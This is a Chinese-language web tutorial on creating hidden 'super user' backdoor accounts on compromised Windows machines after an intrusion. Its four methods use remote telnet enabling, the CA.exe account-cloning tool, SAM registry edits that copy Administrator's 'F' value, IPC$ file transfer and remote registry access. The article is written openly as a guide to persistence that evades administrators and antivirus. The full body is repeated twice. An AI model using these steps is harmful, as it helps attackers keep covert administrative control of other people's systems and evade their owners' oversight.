克隆賬戶隱藏超級用戶創(chuàng)建全接觸
發(fā)布時間:2011-05-01 01:09:22 作者:佚名
我要評論

成功入侵達到目的之后,是不是想再做的點什么?哦!得多留個心眼,留下個后門什么的?可后門木馬程序容易被查殺,還是創(chuàng)建一個隱藏的超級用戶比較安全,在學習借鑒的基礎,經過反復研究實踐,總結出了如下如下幾種創(chuàng)建隱藏超級用戶的方法。
一、利用帳戶克隆工具來創(chuàng)建
Clone Administrator(CA.exe),利用這個工具可以將Administrator的帳號克隆為一個指定的普通帳號(此普通帳號必須已經存在)??寺〉玫降膸ぬ柧哂泻拖到y內置的Administrator同樣的設置,并且用NET命令或者用戶管理器也發(fā)現不了其權限已經被提升,是一個不錯的ROOT KIT。
現在,我們就來看看如何利用帳戶克隆工具在肉雞上創(chuàng)建隱藏的超級用戶。
利用流光、SuperScan等進行掃描,假設已經掃描到一遠程主機的Administrator帳戶,其密碼為123。我們可以使用DameWare Mini Remote Control(簡稱DMRC),在圖形界面(GUI)中來遠程控制遠程主機。也可以使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,其命令格式為:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,沒想這么成功容易就開啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶及密碼,成功獲取一SHELL。

首先想辦法查看一下有哪些用戶被細心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會將guest禁用,當然也會禁用其他用戶。在圖形界面下,非常容易識別,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉。但在命令行狀態(tài)下,只能使用命令:“net user 用戶名”一個一個來查看用戶是否被禁用。如果懶得這樣麻煩,可自行建立一個新的帳戶,命令為:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”來停用此帳戶。

斷開與遠程主機的連接,用小榕的超級用戶克隆程序CA.exe,將被禁用的用戶hacker$克隆成超級用戶,命令為:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!

這時,hacker$就成為了超級用戶,并有具有和Administrator同樣的設置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。

看到這一行返回信息沒有?“[hacker$] AS SAME AS [Administrator]”,說明hacker$帳戶和Administrator相同,克隆成功。
二、圖形界面建隱藏超級用戶
恐怕我們最熟悉的就是在圖形界面下進行操作了,這對于在本地計算機、3389終端服務肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級用戶 再好不過了。
大家知道嗎?Windows 2000中有兩個注冊表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實為一個程序,修改鍵值的權限時在右鍵快捷菜單中選擇“權限”來修改。對Regedit.exe我想大家都很熟悉,但卻不能對注冊表的鍵進行權限設置,而Regedt32.exe最大的優(yōu)點就是能夠對注冊表的項鍵設置權限。Windows NT/2000/XP的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其他用戶都沒有權限查看到其中的信息,因此首先得用Regedt32.exe對“HKEY_LOCAL_MACHINE\SAM\SAM”鍵設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫操作。
首先在肉雞中創(chuàng)建一個新的帳戶hacker$,可以在帳戶管理器中建立,也可以使用命令:net user hacker$ 123 /add 來創(chuàng)建。然后通過“開始”菜單中的“運行”,輸入regedt32.exe,點擊“確定”后就打開了注冊表編輯器。依次展開子鍵HKEY_LOCAL_MACHINE\SAM\SAM,用鼠標右鍵單擊,在彈出的快捷菜單中選擇“權限”項。

在出現的“SAM 權限”對話窗口中,點擊“添加”將我登錄時的帳戶添加到“組或用戶名稱”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權限功能區(qū)設置權限為“完全控制”。

小提示:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以后,再來這里將你添加的帳戶刪除即可。
如果還是不能展開子鍵,請關閉后重新打開,如果是Windows 2000的機器,請關閉這個注冊表編輯器,重新打開“regedit.exe”。展開子鍵:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,在其右側窗口中發(fā)現其默認值為0x3F1。

下面將hacker$鍵、hacker$對應的項000003F1以及administrator所對應的項000001F4導出為hacker.reg、3EE.reg和1f4.reg,退出注冊表編輯器。用記事本分別打開這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除,最后再將hacker.reg導入注冊表即可。
現在,隱藏的超級用戶hacker$已經建好了。打開regedt32.exe,把HKEY_LOCAL_MACHINE\SAM\SAM鍵權限改回原來的樣子(只要刪除添加的帳戶administrator即可)。
注意:隱藏的超級用戶建好后,就能在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
三、命令行建立隱藏超級用戶
首先通過使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,然后TELNET遠程登陸得到一個shell,創(chuàng)建一個新的帳戶,命令為:
net user hacker$ youkou /add,然后就來導出注冊表項HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users,運行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,其中/e 是regedit.exe的參數,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users這個鍵的一定要以“\”結尾。

斷開TELNET連接,建立IPC會話:net use \\192.XX.XX.2\ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為:copy \\192.XX.XX.2\D$\hacker.reg,用記事本編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值(hacker$對應的項在不同的機器而不同),編輯好后再上傳:copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
再TELNET到遠程主機,使用命令net user hacker$ /del刪除hacker$帳戶,然后把hacker.reg導入,命令為:regedit.exe /s hacker.reg,其中參數/s表示以安靜模式導入。這樣就成功創(chuàng)建了一個隱藏的超級用戶。
四、連接遠程肉雞注冊表創(chuàng)建
還有一個比較簡單方便的辦法,就是通過控制臺以及注冊表編輯器“文件”菜單中的“連接網絡注冊表”功能來完成隱藏超級用戶的創(chuàng)建。
通過“開始”菜單中的“運行”,輸入MMC,回車后即打開了控制臺,打開“文件”菜單中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現的對話框中點擊“添加”按鈕,在出現的“添加獨立管理單元”對話框中的列表中選擇“本地用戶和組”。

單擊“添加”即彈出“選擇目標機器”對話框,選中“另一臺計算機”,在其后輸入遠程計算機的IP地址,點擊“完成”。

一路關閉返回至控制臺窗口,我們就可對遠程計算機進行組和用戶的管理了,在右側窗口空白處右擊,在彈出的快捷選擇“新用戶”建立一帳戶hacker$吧!
我們知道,regedit.exe、regedt32.exe都有連接網絡注冊表的功能,我們可以用regedt32.exe來為遠程主機的注冊表項設置權限,用regedit.exe來編輯遠程注冊表。導出相應注冊項,然后進行編輯修改(同上面介紹相似)。

現在在“控制臺”中刪除剛建立的帳戶hacker$,然后關閉。然后在注冊表編輯器中通過“文件”菜單中的“導入”功能將上面導出的文件導入即可。
如果遠程主機沒有開啟遠程注冊表服務,請自行開啟,因為你一開始就已經擁有其管理員帳戶密碼。
五、需注意的幾點事項
1、隱藏的超級用戶建立以后,在帳戶管理器中和命令行下均看不到這個用戶,但這個用戶卻存在。
2、隱藏的超級用戶建立以后,就不能再修改密碼了,因為一旦修改密碼,這個隱藏的超級用戶就會暴露在帳戶管理器中,而且不能刪除。
3、如在本機上創(chuàng)建隱藏的超級用戶時,最好用系統自帶的備份工具先備份好注冊表。
想不想在電腦上大顯身手?自己動手試一試吧!
Clone Administrator(CA.exe),利用這個工具可以將Administrator的帳號克隆為一個指定的普通帳號(此普通帳號必須已經存在)??寺〉玫降膸ぬ柧哂泻拖到y內置的Administrator同樣的設置,并且用NET命令或者用戶管理器也發(fā)現不了其權限已經被提升,是一個不錯的ROOT KIT。
現在,我們就來看看如何利用帳戶克隆工具在肉雞上創(chuàng)建隱藏的超級用戶。
利用流光、SuperScan等進行掃描,假設已經掃描到一遠程主機的Administrator帳戶,其密碼為123。我們可以使用DameWare Mini Remote Control(簡稱DMRC),在圖形界面(GUI)中來遠程控制遠程主機。也可以使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,其命令格式為:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,沒想這么成功容易就開啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶及密碼,成功獲取一SHELL。

首先想辦法查看一下有哪些用戶被細心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會將guest禁用,當然也會禁用其他用戶。在圖形界面下,非常容易識別,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉。但在命令行狀態(tài)下,只能使用命令:“net user 用戶名”一個一個來查看用戶是否被禁用。如果懶得這樣麻煩,可自行建立一個新的帳戶,命令為:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”來停用此帳戶。

斷開與遠程主機的連接,用小榕的超級用戶克隆程序CA.exe,將被禁用的用戶hacker$克隆成超級用戶,命令為:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!

這時,hacker$就成為了超級用戶,并有具有和Administrator同樣的設置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。

看到這一行返回信息沒有?“[hacker$] AS SAME AS [Administrator]”,說明hacker$帳戶和Administrator相同,克隆成功。
二、圖形界面建隱藏超級用戶
恐怕我們最熟悉的就是在圖形界面下進行操作了,這對于在本地計算機、3389終端服務肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級用戶 再好不過了。
大家知道嗎?Windows 2000中有兩個注冊表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實為一個程序,修改鍵值的權限時在右鍵快捷菜單中選擇“權限”來修改。對Regedit.exe我想大家都很熟悉,但卻不能對注冊表的鍵進行權限設置,而Regedt32.exe最大的優(yōu)點就是能夠對注冊表的項鍵設置權限。Windows NT/2000/XP的帳戶信息都在注冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其他用戶都沒有權限查看到其中的信息,因此首先得用Regedt32.exe對“HKEY_LOCAL_MACHINE\SAM\SAM”鍵設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫操作。
首先在肉雞中創(chuàng)建一個新的帳戶hacker$,可以在帳戶管理器中建立,也可以使用命令:net user hacker$ 123 /add 來創(chuàng)建。然后通過“開始”菜單中的“運行”,輸入regedt32.exe,點擊“確定”后就打開了注冊表編輯器。依次展開子鍵HKEY_LOCAL_MACHINE\SAM\SAM,用鼠標右鍵單擊,在彈出的快捷菜單中選擇“權限”項。

在出現的“SAM 權限”對話窗口中,點擊“添加”將我登錄時的帳戶添加到“組或用戶名稱”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權限功能區(qū)設置權限為“完全控制”。

小提示:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以后,再來這里將你添加的帳戶刪除即可。
如果還是不能展開子鍵,請關閉后重新打開,如果是Windows 2000的機器,請關閉這個注冊表編輯器,重新打開“regedit.exe”。展開子鍵:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,在其右側窗口中發(fā)現其默認值為0x3F1。

下面將hacker$鍵、hacker$對應的項000003F1以及administrator所對應的項000001F4導出為hacker.reg、3EE.reg和1f4.reg,退出注冊表編輯器。用記事本分別打開這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除,最后再將hacker.reg導入注冊表即可。
現在,隱藏的超級用戶hacker$已經建好了。打開regedt32.exe,把HKEY_LOCAL_MACHINE\SAM\SAM鍵權限改回原來的樣子(只要刪除添加的帳戶administrator即可)。
注意:隱藏的超級用戶建好后,就能在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。
三、命令行建立隱藏超級用戶
首先通過使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,然后TELNET遠程登陸得到一個shell,創(chuàng)建一個新的帳戶,命令為:
net user hacker$ youkou /add,然后就來導出注冊表項HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users,運行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,其中/e 是regedit.exe的參數,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users這個鍵的一定要以“\”結尾。

斷開TELNET連接,建立IPC會話:net use \\192.XX.XX.2\ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為:copy \\192.XX.XX.2\D$\hacker.reg,用記事本編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項000003EE下的鍵“F”的值(hacker$對應的項在不同的機器而不同),編輯好后再上傳:copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
再TELNET到遠程主機,使用命令net user hacker$ /del刪除hacker$帳戶,然后把hacker.reg導入,命令為:regedit.exe /s hacker.reg,其中參數/s表示以安靜模式導入。這樣就成功創(chuàng)建了一個隱藏的超級用戶。
四、連接遠程肉雞注冊表創(chuàng)建
還有一個比較簡單方便的辦法,就是通過控制臺以及注冊表編輯器“文件”菜單中的“連接網絡注冊表”功能來完成隱藏超級用戶的創(chuàng)建。
通過“開始”菜單中的“運行”,輸入MMC,回車后即打開了控制臺,打開“文件”菜單中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現的對話框中點擊“添加”按鈕,在出現的“添加獨立管理單元”對話框中的列表中選擇“本地用戶和組”。

單擊“添加”即彈出“選擇目標機器”對話框,選中“另一臺計算機”,在其后輸入遠程計算機的IP地址,點擊“完成”。

一路關閉返回至控制臺窗口,我們就可對遠程計算機進行組和用戶的管理了,在右側窗口空白處右擊,在彈出的快捷選擇“新用戶”建立一帳戶hacker$吧!
我們知道,regedit.exe、regedt32.exe都有連接網絡注冊表的功能,我們可以用regedt32.exe來為遠程主機的注冊表項設置權限,用regedit.exe來編輯遠程注冊表。導出相應注冊項,然后進行編輯修改(同上面介紹相似)。

現在在“控制臺”中刪除剛建立的帳戶hacker$,然后關閉。然后在注冊表編輯器中通過“文件”菜單中的“導入”功能將上面導出的文件導入即可。
如果遠程主機沒有開啟遠程注冊表服務,請自行開啟,因為你一開始就已經擁有其管理員帳戶密碼。
五、需注意的幾點事項
1、隱藏的超級用戶建立以后,在帳戶管理器中和命令行下均看不到這個用戶,但這個用戶卻存在。
2、隱藏的超級用戶建立以后,就不能再修改密碼了,因為一旦修改密碼,這個隱藏的超級用戶就會暴露在帳戶管理器中,而且不能刪除。
3、如在本機上創(chuàng)建隱藏的超級用戶時,最好用系統自帶的備份工具先備份好注冊表。
想不想在電腦上大顯身手?自己動手試一試吧!
相關文章
- CC主要是用來攻擊頁面的,大家都有這樣的經歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06
- 入侵者主要通過Potato程序攻擊擁有SYSTEM權限的端口偽造網絡身份認證過程,利用NTLM重放機制騙取SYSTEM身份令牌,最終取得系統權限,該安全風險微軟并不認為存在漏洞,所以2021-04-15
- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結,這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權,需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權與防御方法,需要的朋友可以參考下2017-05-13- 不久之前我們說過關于http和https的區(qū)別,對于加密的https,我們一直認為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10
iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統的安全性都是比安卓要高的,但是再安全的系統也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導致用戶信息泄露。2016-07-27- 國家正在修正關于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進入攻擊者郵箱2016-07-06